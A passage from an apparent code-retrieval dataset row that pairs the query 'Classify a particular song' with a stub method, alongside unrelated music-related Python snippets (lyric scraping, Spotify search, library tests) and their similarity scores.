mb_tracks):\n # pylint: disable=R0914\n dbg(\"artists is %s\", artist)\n dbg(\"title is %s\", title)\n title_artist_str = c.g + title + c.w, c.g + artist + c.w\n xprint(\"\\nSearching for %s by %s\\n\\n\" % title_artist_str)\n\n def dtime(x):\n \"\"\" Format time to M:S. \"\"\"\n return time.strftime('%M:%S', time.gmtime(int(x)))\n\n # do matching\n for track in mb_tracks:\n ttitle = track['title']\n length = track['length']\n xprint(\"Search : %s%s - %s%s - %s\" % (c.y, artist, ttitle, c.w,\n dtime(length)))\n q = \"%s %s\" % (artist, ttitle)\n w = q = ttitle if artist == \"Various Artists\" else q\n query = generate_search_qs(w, 0, result_count=50)\n dbg(query)\n have_results = _search(q, query, splash=False, pre_load=False)\n\n if not have_results:\n xprint(c.r + \"Nothing matched :(\\n\" + c.w)\n continue\n\n results = g.model.songs\n s, score = _best_song_match(results, artist + \" \" + ttitle, length)\n cc = c.g if score > 85 else c.y\n cc = c.r if score < 75 else cc\n xprint(\"Matched: %s%s%s - %s \\n[%sMatch confidence: \"\n \"%s%s]\\n\" % (c.y, s.title, c.w, fmt_time(s.length),\n cc, score, c.w))\n yield s", "def artist_comparisons():\n file_names = os.listdir(\"lyrics_files\")\n songs_dict = {song_file[:-8]: pickle.load(open(\"lyrics_files/\" + song_file, 'rb')) for song_file in file_names} # filenames end with _songs.p, so we use -8 to delete that\n artists = songs_dict.keys()\n output_dict = {}\n artist_pairs = []\n print \"Comparing artists\"\n for i in xrange(0, len(artists) - 1):\n for j in xrange(i + 1, len(artists)):\n artist_pairs.append((artists[i], artists[j]))\n for pair in artist_pairs:\n print pair\n output_dict[pair] = compare_artists(pair[0], pair[1], songs_dict)\n print output_dict[pair] \n pickle.dump(output_dict, open(\"artist_comparisons.p\", \"wb\"))\n print \"Pickled artist comparisons\"", "def recommendation_genre_seeds(self) -> List[str]:\n return self._get('recommendations/available-genre-seeds')['genres']", "def test_items(self):\n obs = self.tester.items()\n self.assertTrue(isinstance(obs, Iterable))\n exp = [('1.SKB1.640202', Sample('1.SKB1.640202', self.tester)),\n ('1.SKB2.640194', Sample('1.SKB2.640194', self.tester)),\n ('1.SKB3.640195', Sample('1.SKB3.640195', self.tester)),\n ('1.SKB4.640189', Sample('1.SKB4.640189', self.tester)),\n ('1.SKB5.640181', Sample('1.SKB5.640181', self.tester)),\n ('1.SKB6.640176', Sample('1.SKB6.640176', self.tester)),\n ('1.SKB7.640196', Sample('1.SKB7.640196', self.tester)),\n ('1.SKB8.640193', Sample('1.SKB8.640193', self.tester)),\n ('1.SKB9.640200', Sample('1.SKB9.640200', self.tester)),\n ('1.SKD1.640179', Sample('1.SKD1.640179', self.tester)),\n ('1.SKD2.640178', Sample('1.SKD2.640178', self.tester)),\n ('1.SKD3.640198', Sample('1.SKD3.640198', self.tester)),\n ('1.SKD4.640185', Sample('1.SKD4.640185', self.tester)),\n ('1.SKD5.640186', Sample('1.SKD5.640186', self.tester)),\n ('1.SKD6.640190', Sample('1.SKD6.640190', self.tester)),\n ('1.SKD7.640191', Sample('1.SKD7.640191', self.tester)),\n ('1.SKD8.640184', Sample('1.SKD8.640184', self.tester)),\n ('1.SKD9.640182', Sample('1.SKD9.640182', self.tester)),\n ('1.SKM1.640183', Sample('1.SKM1.640183', self.tester)),\n ('1.SKM2.640199', Sample('1.SKM2.640199', self.tester)),\n ('1.SKM3.640197', Sample('1.SKM3.640197', self.tester)),\n ('1.SKM4.640180', Sample('1.SKM4.640180', self.tester)),\n ('1.SKM5.640177', Sample('1.SKM5.640177', self.tester)),\n ('1.SKM6.640187', Sample('1.SKM6.640187', self.tester)),\n ('1.SKM7.640188', Sample('1.SKM7.640188', self.tester)),\n ('1.SKM8.640201', Sample('1.SKM8.640201', self.tester)),\n ('1.SKM9.640192', Sample('1.SKM9.640192', self.tester))]\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs)), sorted(exp)):\n self.assertEqual(o, e)", "def fixed_test_audio(self, num_test_audio):\n test_filenames = np.random.choice(self.filepaths, num_test_audio)\n test_noisy_set = [np.load(f)[1] for f in test_filenames]\n # file names of test samples\n test_basenames = [os.path.basename(fpath) for fpath in test_filenames]\n return test_basenames, np.array(test_noisy_set).reshape(num_test_audio, 1, 16384)", "def test_check_alter_names():\n gene_list = []\n gene, gene_list= check_gff(INPUT_ok, gene_list)\n # print(gene, gene_list)\n assert_equal(gene, \"GPLIN_000000100\")\n assert_equal(gene_list, [\"GPLIN_000000100\"])", "def test_various_artists(self):\n self.add_mp3(artist='Artist 1', title='Title 1',\n album='Album 1', filename='song1.mp3', path='album_1')\n self.add_mp3(artist='Artist 2', title='Title 2',\n album='Album 1', filename='song2.mp3', path='album_1')\n self.add_mp3(artist='Artist 2', title='Title 3',\n album='Album 2', filename='song3.mp3', path='album_2')\n self.add_mp3(artist='Artist 3', title='Title 4',\n album='Album 2', filename='song4.mp3', path='album_2')\n self.run_add()\n\n self.assertEqual(Artist.objects.count(), 4)\n self.assertEqual(Album.objects.count(), 2)\n self.assertEqual(Song.objects.count(), 4)\n\n artist_1 = Artist.objects.get(name='Artist 1')\n artist_2 = Artist.objects.get(name='Artist 2')\n artist_3 = Artist.objects.get(name='Artist 3')\n various = Artist.objects.get(name='Various')\n\n album_1 = Album.objects.get(name='Album 1')\n album_2 = Album.objects.get(name='Album 2')\n\n song_1 = Song.objects.get(filename='album_1/song1.mp3')\n song_2 = Song.objects.get(filename='album_1/song2.mp3')\n song_3 = Song.objects.get(filename='album_2/song3.mp3')\n song_4 = Song.objects.get(filename='album_2/song4.mp3')\n\n response = self.client.get(reverse('exordium:artist', args=(artist_1.normname,)))\n self.assertEqual(response.status_code, 200)\n\n # Only the Various Artists album should show up\n self.assertContains(response, '1 album')\n self.assertQuerysetEqual(response.context['albums'].data, [repr(album_1)])\n self.assertContains(response, reverse('exordium:album', args=(album_1.pk,)))\n self.assertContains(response, reverse('exordium:artist', args=(various.normname,)))\n self.assertNotContains(response, str(album_2))\n self.assertNotContains(response, reverse('exordium:album', args=(album_2.pk,)))\n\n # Only one song should show up\n self.assertContains(response, '1 song')\n self.assertQuerysetEqual(response.context['songs'].data, [repr(song_1)])\n self.assertContains(response, reverse('exordium:artist', args=(artist_1.normname,)))\n # This check is a bit silly since it's already shown up above\n self.assertContains(response, reverse('exordium:album', args=(album_1.pk,)))\n self.assertContains(response, song_1.get_download_url_html5())\n self.assertContains(response, song_1.get_download_url_m3u())\n for song in [song_2, song_3, song_4]:\n self.assertNotContains(response, str(song))\n self.assertNotContains(response, song.get_download_url_html5())\n self.assertNotContains(response, song.get_download_url_m3u())\n\n # Shouldn't see any links to our other two artists\n for artist in [artist_2, artist_3]:\n self.assertNotContains(response, str(artist))\n self.assertNotContains(response, reverse('exordium:artist', args=(artist.normname,)))", "def ar_gen(frequentItemSets):\n# print frequentItemSets\n for fItemSet in frequentItemSets:\n if fItemSet:\n itemSets = fItemSet.keys()\n for itemSet in itemSets:\n subsets = subset_gen(itemSet)\n# print itemSet\n# print subsets\n if subsets:\n for subset in subsets:\n sptSubSet = supportItemSet(subset, frequentItemSets)\n sptSubSets = supportItemSet(itemSet, frequentItemSets)\n print subset,'->', itemSet.difference(subset), 'confidence=',sptSubSets/float(sptSubSet)", "def test_values(self):\n obs = self.tester.values()\n self.assertTrue(isinstance(obs, Iterable))\n exp = {PrepSample('1.SKB1.640202', self.tester),\n PrepSample('1.SKB2.640194', self.tester),\n PrepSample('1.SKB3.640195', self.tester),\n PrepSample('1.SKB4.640189', self.tester),\n PrepSample('1.SKB5.640181', self.tester),\n PrepSample('1.SKB6.640176', self.tester),\n PrepSample('1.SKB7.640196', self.tester),\n PrepSample('1.SKB8.640193', self.tester),\n PrepSample('1.SKB9.640200', self.tester),\n PrepSample('1.SKD1.640179', self.tester),\n PrepSample('1.SKD2.640178', self.tester),\n PrepSample('1.SKD3.640198', self.tester),\n PrepSample('1.SKD4.640185', self.tester),\n PrepSample('1.SKD5.640186', self.tester),\n PrepSample('1.SKD6.640190', self.tester),\n PrepSample('1.SKD7.640191', self.tester),\n PrepSample('1.SKD8.640184', self.tester),\n PrepSample('1.SKD9.640182', self.tester),\n PrepSample('1.SKM1.640183', self.tester),\n PrepSample('1.SKM2.640199', self.tester),\n PrepSample('1.SKM3.640197', self.tester),\n PrepSample('1.SKM4.640180', self.tester),\n PrepSample('1.SKM5.640177', self.tester),\n PrepSample('1.SKM6.640187', self.tester),\n PrepSample('1.SKM7.640188', self.tester),\n PrepSample('1.SKM8.640201', self.tester),\n PrepSample('1.SKM9.640192', self.tester)}\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs), key=lambda x: x.id),\n sorted(exp, key=lambda x: x.id)):\n self.assertEqual(o, e)", "def test_sounds_id_get(self):\n pass", "def test_ms_playlist_search(helpers):\n item_from_xml, item_from_dict = common_tests(\n MSAlbumList,\n MS_PLAYLIST_SEARCH_XML,\n MS_PLAYLIST_SEARCH_DICT,\n \"00020064playlistsearch:Dans &\",\n helpers,\n )\n getter_attributes_test(\n \"uri\", item_from_xml, item_from_dict, MS_PLAYLIST_SEARCH_DICT[\"uri\"]\n )", "def candidates(self, items, artist, album, va_likely):\n candidate_list = []\n candidate_list.append(WikiAlbum(artist, album))\n\n return candidate_list", "def test_bunch_of_files(self):\n bunch = [\"1.тест.mp3\", \"2.smash.mp3\", \"3.дdд.mp3\"]\n expected = [\"1.test.mp3\", \"2.smash.mp3\", \"3.ddd.mp3\"]\n for audio in bunch:\n f = open(audio, 'w+')\n f.close()\n audios = filter(lambda x: x.endswith(\".mp3\"), os.listdir())\n for audio in audios:\n rename_audio(audio)\n audios = filter(lambda x: x.endswith(\".mp3\"), os.listdir())\n for a, b in zip(audios, expected):\n print(a, b)\n for filename, expectation in zip(audios, expected):\n self.assertEqual(filename, expectation)", "def get_movies_by_genre(self, genre: str):\n raise NotImplementedError", "def test_filterSamples(self):\r\n exp = ['PC.356', 'PC.593']\r\n self.overview_map.filterSamples(['PC.593', 'PC.356'])\r\n obs = self.overview_map.SampleIds\r\n self.assertEqual(obs, exp)\r\n\r\n self.overview_map.filterSamples([])\r\n self.assertEqual(self.overview_map.SampleIds, [])" ]
[ "0.6808168", "0.65337896", "0.63130933", "0.61084867", "0.5960939", "0.59207577", "0.57667565", "0.5645742", "0.56377244", "0.5593208", "0.55835515", "0.5554038", "0.5543787", "0.551411", "0.55078", "0.5503138", "0.5479609", "0.54730666", "0.54501826", "0.5445314", "0.5428625", "0.5417381", "0.54008317", "0.53966415", "0.5386453", "0.53828526", "0.53826547", "0.5367364", "0.5366679", "0.5365371", "0.53647596", "0.5359856", "0.5348318", "0.5341709", "0.5333103", "0.53196216", "0.5308514", "0.5287704", "0.5280575", "0.5279823", "0.52755874", "0.5263987", "0.52489567", "0.5239795", "0.52361965", "0.5223399", "0.52200556", "0.52195746", "0.5195377", "0.5188798", "0.51754636", "0.51716655", "0.51661986", "0.5158656", "0.51568234", "0.51542425", "0.5150297", "0.5150101", "0.5148367", "0.5131027", "0.5108495", "0.5099789", "0.5099706", "0.5095855", "0.5094745", "0.509272", "0.50864196", "0.5071111", "0.506868", "0.505849", "0.50526065", "0.50515574", "0.5044688", "0.50408334", "0.50406456", "0.504008", "0.5038693", "0.5028265", "0.50203985", "0.50183827", "0.5014878", "0.5013931", "0.50136024", "0.500582", "0.5005778", "0.49981248", "0.4989734", "0.4976592", "0.49630708", "0.49576437", "0.49570942", "0.49512517", "0.4947417", "0.4940064", "0.4938069", "0.49358615", "0.49341276", "0.49306786", "0.49297038", "0.4927558" ]
0.65475684
1
Classify a particular song.
def classify(self, song): raise NotImplementedError
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def classify_playlist(classifier, playlist_feature_data, playlist_data_dict):\n\n clf, clf_name = classifier\n\n playlist_features, playlist_song_ids = playlist_feature_data\n # run classifier on playlist songs\n results = clf.predict_all(playlist_features)\n liked_songs = [playlist_song_ids[i] for i in range(len(results)) if results[i] == 1]\n\n # get songs they'd like based on song ID\n if not liked_songs:\n print(\n \"The classifier \"\n + clf_name\n + \" thinks you wouldn't like any songs in \\\n the given playlist.\"\n )\n return\n\n print(\n \"The classifier \"\n + clf_name\n + \" thinks you'd like the following from the given playlist:\\n\"\n )\n\n for song in liked_songs:\n print(playlist_data_dict[song][\"metadata\"][\"track_name\"])\n\n numLiked = len(liked_songs)\n totalSongs = len(playlist_song_ids)\n matchRate = numLiked / totalSongs * 100\n\n print(\n \"The classifier \"\n + clf_name\n + \" thinks you'd dislike the following from the given playlist:\\n\"\n )\n for song in playlist_song_ids:\n if song not in liked_songs:\n print(playlist_data_dict[song][\"metadata\"][\"track_name\"])\n\n # spotify:playlist:37i9dQZF1DWXJfnUiYjUKT\n\n # spotify:playlist:37i9dQZF1DXcRXFNfZr7Tp\n\n print(f\"Thats a taste match of {matchRate}%\")\n print()\n return", "def song(song_id):\n return process_input(song_id) #jsonify(recomendations)", "def song(self, value):\r\n self._song_id = value\r\n data = Song(value)\r\n self.songtitel = data.songtitel if data.found else \"\"", "def associate_song(self, song):\n self.songs.append(song)", "def __add_song(self, song, genius_api):\n\t\tentry = {\n\t\t\t'id' : int(song['id']),\n\t\t\t'title' : song['title'],\n\t\t\t'primary_artist' : {\n\t\t\t\t'id' : song['primary_artist']['id'],\n\t\t\t\t'name' : str(song['primary_artist']['name']).lower(),\n\t\t\t\t'url' : song['primary_artist']['url'],\n\t\t\t\t'is_verified' : song['primary_artist']['is_verified'],\n\t\t\t\t},\n\t\t\t'url' : song['url'],\n\t\t\t'lyrics' : genius_api.get_lyrics(song['id'], song['url'])\n\t\t\t}\n\t\tif song['album']:\n\t\t\tentry['album'] = {\n\t\t\t\t'id': song['album']['id'], \n\t\t\t\t'full_title': song['album']['full_title'], \n\t\t\t\t'name': song['album']['name'], \n\t\t\t\t'artist': song['album']['artist']['id']\n\t\t\t\t}\n\t\tif song['release_date']:\n\t\t\tentry['release_date'] = song['release_date']\n\t\tif len(song['featured_artists']) > 0:\n\t\t\tfeatured_artists = list()\n\t\t\tfor artist in song['featured_artists']:\n\t\t\t\tart = {\n\t\t\t\t\t'id' : artist['id'],\n\t\t\t\t\t'name' : artist['name'].lower()\n\t\t\t\t\t}\n\t\t\t\tfeatured_artists.append(art)\n\t\t\tentry['featured_artists'] = featured_artists\n\t\t\t#Step 3: Insert Artist into MongoDB via isnert_one\n\t\tself.db.songs.insert_one(entry)", "def import_song(self, song, playlist):\n\n try:\n song_uri = self.find_song_uri(song)\n except SongNotFoundError as e:\n print(f\"could not find song {song} to add to playlist '{playlist['name']}'\")\n else:\n self.add_song_to_playlist(song_uri, playlist[\"id\"])", "def classify(new_music,fit):\n\tr = robjects.r\n\tp = prob_category(new_music,fit)\n\trobjects.globalenv[\"pred\"] = p\n\tr(\"\"\"\n\ttmp3 = vector()\n\tfor(i in 1:length(pred[,1])){\n\t\txx <- unlist(pred[i,])\n\t\ttmp3 <- append(tmp3,which(xx==max(xx)))\n\t}\n\tclasses <- names(tmp3)\n\t\"\"\")\n\treturn list(robjects.globalenv[\"classes\"])", "def add_song(self, song):\n self.songs.append(song)", "def test_song(self):\n doc = et.parse_xml(SONG)\n song = doc.find('song')\n store = DummyStore()\n track = ampache_storage.Track(store, song)\n self.assertEqual(track.get_id(), 'song.3180')\n self.assertEqual(track.parent_id, 'album.2910')\n self.assertEqual(track.duration, '0:03:54')\n self.assertEqual(track.get_url(),\n 'http://localhost/play/index.php?oid=123908...')\n self.assertEqual(track.get_name(), 'Hells Bells')\n self.assertEqual(track.title, 'Hells Bells')\n self.assertEqual(track.artist, 'AC/DC')\n self.assertEqual(track.album, 'Back in Black')\n self.assertEqual(track.genre, None)\n self.assertEqual(track.track_nr, '4')\n self.assertEqual(track.cover, 'http://localhost/image.php?id=129348')\n self.assertEqual(track.mimetype, 'audio/mpeg') # guessed\n self.assertEqual(track.size, 654321)\n self.assertIs(track.get_path(), None)\n self.assertEqual(track.get_children(), [])\n self.assertEqual(track.get_child_count(), 0)", "def cheer(self, songs):\n if self.favourite_song in songs:\n return \"Whoo!\"", "def add_song(self, song: Song) -> None:\n\n self.songs.append(song)\n self.set_song_count(len(self.songs))", "def update(self, song: int) -> None:\n if 0 <= song < len(self.sounds):\n self.sounds[song].play()", "def analyze(title, artist):\n lyric_sentiment = 0\n title_sentiment = 0\n\n # Load the machine learning based model\n modelIMDB = nn_lyrics.loadModel(\"IMDB\")\n encoderIMDB = nn_lyrics.createEncoder(\"IMDB\")\n modelYelp = nn_lyrics.loadModel(\"Yelp\")\n encoderYelp = nn_lyrics.createEncoder(\"Yelp\")\n\n # Get the lyrics of the song\n print(\"Analyzing\", title, \"by\", artist, \"...\\n\")\n song = basic_lyrics.getSong(title, artist)\n if song is None:\n return\n lyrics_received = basic_lyrics.getLyrics(song)\n print(\"\")\n\n # weight_map = lyric_weights.getWeightMap(lyrics_received) Needed for line by line analysis\n\n # Get and print stats about the song\n feature_vec = features.getTrackFeatures(title, artist)\n features.printFeatures(feature_vec)\n tempo = int(feature_vec[5])\n mode = int(feature_vec[7])\n loudness = int(feature_vec[8])\n\n # Lexicon based analysis\n lyric_sentiment += ((basic_lyrics.analyze(lyrics_received, print=False) + 1)/2) # x+1/2 to convert to 0-1 scale\n title_sentiment += ((basic_lyrics.analyze(title, print=False) + 1)/2)\n\n # IMDB Model prediction\n imdb_lyrics = nn_lyrics.predict(lyrics_received, pad=True, model_to_predict=modelIMDB,\n encoder=encoderIMDB, prepro=True)\n lyric_sentiment += imdb_lyrics\n imdb_title = nn_lyrics.predict(title, pad=False, model_to_predict=modelIMDB,\n encoder=encoderIMDB, prepro=False) # Don't pre-process title since it is so short\n title_sentiment += imdb_title\n\n # Yelp Model Prediction\n yelp_lyrics = nn_lyrics.predict(lyrics_received, pad=True, model_to_predict=modelYelp,\n encoder=encoderYelp, prepro=True)\n lyric_sentiment += yelp_lyrics\n yelp_title = nn_lyrics.predict(title, pad=False, model_to_predict=modelYelp,\n encoder=encoderYelp, prepro=False)\n title_sentiment += yelp_title\n\n lyric_sentiment = lyric_sentiment/3\n title_sentiment = title_sentiment/3\n\n print(\"\\nLyric Sentiment: \", lyric_sentiment)\n print(\"\\nTitle Sentiment: \", title_sentiment)\n\n final_sentiment = equation.sentiment(mode, lyric_sentiment, title_sentiment, loudness, tempo)\n\n print(\"\\nFinal Sentiment: \", final_sentiment)", "def __init__(self, SONG):\n self.track_name = SONG['name']\n self.artist_name = SONG['artist']\n self.provider = 'lastfm'\n self.track_number = \"1\"\n self.collection_name = \"\"\n self.release_date = \"\"\n self.artwork_url_100 = SONG[\"image\"][-1][\"#text\"]\n self.track_time = \"\"\n self.primary_genre_name = \"N/A\"", "def importsong(fpath):\n result = \"\"\n\n tags = checkid3(fpath)\n if tags is not None:\n sig = sigfile(fpath)\n exsong = Song.objects.filter(uniq=sig)\n\n if len(exsong) > 0:\n if exsong[0].filename != fpath:\n result = updatesong(exsong[0], fpath)\n else:\n result = \"[X] %s\" % exsong[0].title\n else:\n result = createsong(tags, sig, fpath, songminplay())\n else:\n logger.error('No tags found in [%s]' % fpath)\n\n return result", "def __add_lyric(self, song, genius_api):\n\t\tentry = {\n\t\t\t'song_id' : int(song['id']),\n\t\t\t'song_title' : song['title'],\n\t\t\t'url' : song['url']\n\t\t\t}\n\t\ttry:\n\t\t\tentry['lyrics'] = genius_api.get_lyrics(song['id'], song['url'])\n\t\texcept:\n\t\t\tentry['lyrics'] = ''\t\n\t\t\t\t#Step 3: Insert Artist into MongoDB via isnert_one\n\t\ttry:\n\t\t\tself.db.lyrics.insert_one(entry)\n\t\texcept errors.DuplicateKeyError:\n\t\t\tpass", "def get_song(track):\n # Extract some identifying track information\n Title = track['name'].encode('utf-8')\n title = normalize(Title)\n Artist = [a['name'].encode('utf-8') for a in track['artists']]\n Album = track['name'].encode('utf-8')\n Popularity = track['popularity']\n # Put information into a namedTuple for convenience\n song = Track(Title, Artist, Album, Popularity, title)\n return song", "def classify(self, example):\n raise NotImplementedError()", "def song(self):\n if self.__class__.__name__ == 'Song':\n return self\n return self.parent.song", "def _extract_songObj(self):\n if self.URL_type == \"youtube\":\n self.title = self.songObj.title\n self.URL = self.songObj.URL\n self._get_youtube_data_url()\n elif self.URL_type == \"soundcloud\":\n self.title = self.songObj.title\n self.stream_url = self.songObj.URL", "def tekstowo_song(url, save):\n print '[crawler] processing tekstowo_song({}, {})'.format(url, save)\n source = html_dl(url)\n try :\n tags = tesktowo_tags(source)\n yt_url = tekstowo_youtube_url(source)\n ret = youtube_dl_mp3(yt_url)\n except Exception, e:\n print e\n print colored(\"[crawler] processing TERMINATED\", \"red\")\n return\n if recognize(ret['path']) != -1:\n remove_file(ret['path'], save)\n print colored('[crawler] song already in database', 'yellow')\n return\n\n print '[crawler] adding song into database...'\n err = addSong(ret['path'], tags)\n remove_file(ret['path'], save)\n if err != 1:\n print '[crawler] ERROR: while adding song [addSong() errno: %d]' % err\n return\n print colored('[crawler] SUCCESS: song added into database', 'green')", "def load(self, song):\n self.currentSongName = song\n self.currentSong = pygame.mixer.music.load(song)", "def predictType(self):\n return 'Music' if self.name.startswith('mu') else 'Speech'", "def classify_pic(pic_id, pic_name, pic_q):\n if pic_id not in classify_data:\n is_success = download_file(pic_id, pic_name)\n if is_success:\n classify_data[pic_id] = recognize_pic(pic_name)\n else:\n # add pic to the queue on unsuccessful download\n pic_q.put((pic_id, pic_name))\n os.remove(pic_name) # delete pic from local directory\n else:\n print ('%s already classified' % pic_name)", "def classify(self, audio_sample, should_print=True):\n features_left, features_right = self.extract_features(audio_sample)\n classification_counts = [0 for x in range(len(self.speakers))]\n\n for i in range(len(features_left)):\n feature = np.reshape(features_left[i, :], (1, -1))\n\n left_pred = int(self.left_model.predict(feature)[0])\n classification_counts[left_pred] += 1\n\n if self.both_channels:\n right_pred = int(self.right_model.predict(feature)[0])\n classification_counts[right_pred] += 1\n\n probabilities = np.array(classification_counts) / sum(classification_counts)\n pred = np.argmax(probabilities)\n\n if should_print:\n print(probabilities)\n\n if probabilities[pred] > self.certainty:\n print(\"Identified %s\" % self.speakers[pred])\n return self.speakers[pred]\n else:\n print(\"Unidentified Speaker\")\n return -1", "def add_song(self, song: Song):\n self.playlist.append(song)", "def play_music(sid):\n # Get the parameters for the get_song_id request\n artist = None\n album = None\n title = None\n if not request.json:\n # If no JSON parameters were given, just resume playing the song\n db = sqlite3.connect('/home/tropius/TROPIUS/TROPIUS.db')\n host = hosts.get_detail(db, sid)\n spotify.resume(host['ip'])\n return jsonify({})\n else:\n try:\n # Get the host data from the database\n db = sqlite3.connect('/home/tropius/TROPIUS/TROPIUS.db')\n host = hosts.get_detail(db, sid)\n artist = None\n album = None\n track = None\n if request.json.has_key('track') and request.json.get('track'):\n track = request.json.get('track')\n elif request.json.has_key('album') and request.json.get('album'):\n album = request.json.get('album')\n elif request.json.has_key('artist') and request.json.get('artist'):\n artist = request.json.get('artist')\n else:\n spotify.resume(host['ip'])\n return jsonify({})\n spotify.compound_play(host['ip'], artist=artist, album=album, song=track)\n return jsonify({})\n except:\n abort(400)", "async def spotify(self, ctx, *, query):\n\n # Setup the headers with the token that should be here\n headers = {\"Authorization\": \"Bearer {}\".format(self._token)}\n opts = {\"q\": query, \"type\": \"track\"}\n url = \"https://api.spotify.com/v1/search\"\n response = await utils.request(url, headers=headers, payload=opts)\n try:\n await ctx.send(\n response.get(\"tracks\")\n .get(\"items\")[0]\n .get(\"external_urls\")\n .get(\"spotify\")\n )\n except (KeyError, AttributeError, IndexError):\n await ctx.send(\"Couldn't find a song for:\\n{}\".format(query))", "def get_genius_song(song_name, artist_name, genius):\n song_search = song_name\n for i in range(0, 2):\n song = genius.search_song(song_search, artist_name)\n if isinstance(song, type(None)) or not match(\n\t (song_search, artist_name), (song.title, song.artist)\n ):\n if i:\n log(f\"Song '{song_search}' by '{artist_name}' not found on Genius\")\n return\n else:\n log(f\"Song '{song_search}' by '{artist_name}' not found on Genius trying cleaning\")\n song_search = clean(song_search)\n else:\n if i:\n log(f\"Found match for '{song_search}' by '{artist_name}'\")\n break\n\n return song", "def song_changed(self, song):\n if song == NOTPLAYING:\n print(\"Not playing\")\n else:\n print(\"Changed to: {} - {}\". format(song.get('artist', 'Unknown artist'), song.get('title', 'Unknown title')))\n self._publish({TAGS[tag]: value for (tag, value) in song.items() if tag in TAGS})", "def disassociate_song(self, song):\n self.songs.remove(song)", "def add_song(self, song, position=None):\n\n song_found = find_object(song, self.tracks)\n if song_found is None:\n song_found = Song(song, self.artist)\n if position is None:\n self.tracks.append(song_found)\n else:\n self.tracks.insert(position, song_found)", "def find_artist_playlist(data):\n\n return data['artist'].lower() + '.m3u'", "def markfile(self, song_id):\n cur = self.conn.cursor()\n query = \"\"\"UPDATE caro_song SET score = -1000 WHERE id=%s\"\"\"\n cur.execute(query, (song_id, ))\n\n self.memcache.delete(\":1:song_%d\" % song_id)\n\n query = \"\"\"DELETE FROM caro_playlistentry WHERE song_id=%s\"\"\"\n cur.execute(query, (song_id, ))", "def scrape_song(url):\n soup = scrapekit.handle_url(url)\n\n contents = scrape_id_to_div(soup, \"Lyrics\")\n if not contents:\n return None\n\n filetext = ''.join(c.text for c in contents)\n\n # Check if there is a reprise\n REPRISE = 'Reprise'\n\n reprise = soup.find(id=REPRISE)\n if reprise:\n filetext += '\\n\\n'\n filetext += REPRISE + ':\\n\\n'\n\n contents = scrape_id_to_div(soup, REPRISE)\n filetext += ''.join(c.text for c in contents)\n\n # Get song title, fix blank spaces for file name\n songtitle = soup.title.text.split('|')[0]\n\n song_text = ''\n song_text += 'Song: {}\\n'.format(songtitle)\n song_text += get_infobox_info(soup)\n song_text += '\\n\\n'\n song_text += filetext\n\n return song_text", "def save_song(self):\n if self.is_stream:\n self.save_song_from_stream()\n else:\n self.save_song_from_file()", "def delete_song(song):\n logging.debug('{CRUD_operations} BEGIN function delete_song()')\n logging.debug('{CRUD_operations} Data received: song: %s', song)\n song.is_deleted = True\n logging.debug('{CRUD_operations} END function delete_song()')", "def song_found(self, searched_song, result, exact):\n message = {\n \"timestamp\": self._get_time(),\n \"level\": \"INFO\",\n \"type\": \"SONG_FOUND\",\n \"searched_song\": json.dumps(searched_song.to_dict()),\n \"result\": json.dumps(result),\n \"exact\": exact,\n }\n\n self._log_queue.put(json.dumps(message))", "def construct_metadata(song):\n print(song) #temp", "def updatesong(song, fpath):\n song.filename = fpath\n song.save()\n return \"[U] %s\\n\" % song.title", "def add_song(self, name, year, title):\n album_found = find_object(name, self.albums)\n if album_found is None:\n album_found = Album(name, year, self.name)\n self.add_album(album_found)\n album_found.add_song(title)", "def get_song_info(self, song_id):\n return self.__get('song', song_id)", "def test_song_370(self):\n doc = et.parse_xml(SONG_370)\n song = doc.find('song')\n store = DummyStore()\n track = ampache_storage.Track(store, song)\n self.assertEqual(track.get_id(), 'song.3440')\n self.assertEqual(track.parent_id, 'album.359')\n self.assertEqual(track.duration, '0:10:25')\n self.assertEqual(track.get_url(),\n 'http://songserver/ampache/play/index.php?ssid=1e11a4&type=song&oid=3440&uid=4&name=Led%20Zeppelin%20-%20Achilles%20Last%20Stand.mp3')\n self.assertEqual(track.get_name(), 'Achilles Last Stand')\n self.assertEqual(track.title, 'Achilles Last Stand')\n self.assertEqual(track.artist, 'Led Zeppelin')\n self.assertEqual(track.album, 'Presence')\n self.assertEqual(track.genre, None)\n self.assertEqual(track.track_nr, '1')\n self.assertEqual(track.cover, 'http://songserver/ampache/image.php?id=359&object_type=album&auth=1e11a40&name=art.')\n self.assertEqual(track.mimetype, 'audio/mpeg')\n self.assertEqual(track.size, 19485595)\n self.assertIs(track.get_path(), None)\n self.assertEqual(track.get_children(), [])\n self.assertEqual(track.get_child_count(), 0)", "def addSong(self, title, filename):\n #make sure that the filename is valid? or does this happen outside?\n self.__songDictionary[title]=filename\n return True", "def __init__(self, lyrics_url, artist=None, album_title=None, folder_path=None, song_order=None, cover_size='600'):\n self.album = Album(title=album_title, artist=artist)\n self.artist = artist\n self.album_title = album_title\n self.lyrics_url = lyrics_url\n self.song_order = song_order\n self.folder_path = Path(folder_path) if folder_path else None\n self.cover_file_name = 'cover.jpg'\n self.cover_size = f'{cover_size}x{cover_size}'\n self.track_urls = []\n self.cover_downloaded = False\n \n # self.r = requests.get(lyrics_url).text\n # self.soup = BeautifulSoup(self.r, 'html.parser')\n self.r = requests.get(lyrics_url)\n self.soup = BeautifulSoup(self.r.content, 'html.parser')", "def search_song(title, artist):\n\ttitle = quote(title, safe='')\n\tartist = quote(artist, safe='')\n\tbase_url = SPOTIFY_API_HOST + 'search/' + '?q=track:{0}+artist:{1}&type=track&limit=1'\n\turl = base_url.format(title, artist)\n\tresults = requests.get(url).json()\n\n\ttry:\n\t\tif results['tracks']['total'] == 0:\n\t\t\tlogging.debug('Found no results for song {0}'.format(title))\n\t\t\treturn ''\n\texcept KeyError as e:\n\t\tlogging.warning('Invalid result from spotify on key {0}:\\n{1}'.format(e, results))\n\turi_string = results['tracks']['items'][0]['uri']\n\tlogging.debug('Found uri {0} for song {1}'.format(\n\t\turi_string[uri_string.rfind(':')+1:], title))\n\treturn uri_string[uri_string.rfind(':')+1:] # Strip off the 'spotify:track:' tag.", "def remove_song(self, song):\n # code omitted\n self.playlist.remove(song)", "def onair(self, song, score):\n for key in ['title', 'artist', 'score', 'full']:\n self.memcache.delete(\"%s:1:onair_%s\" % (self.prefix, key))\n\n try:\n datas = mutagen.File(song, easy=True)\n except:\n pass\n\n try:\n self.memcache.set(\"%s:1:onair_title\" % self.prefix, datas[\"title\"][0])\n 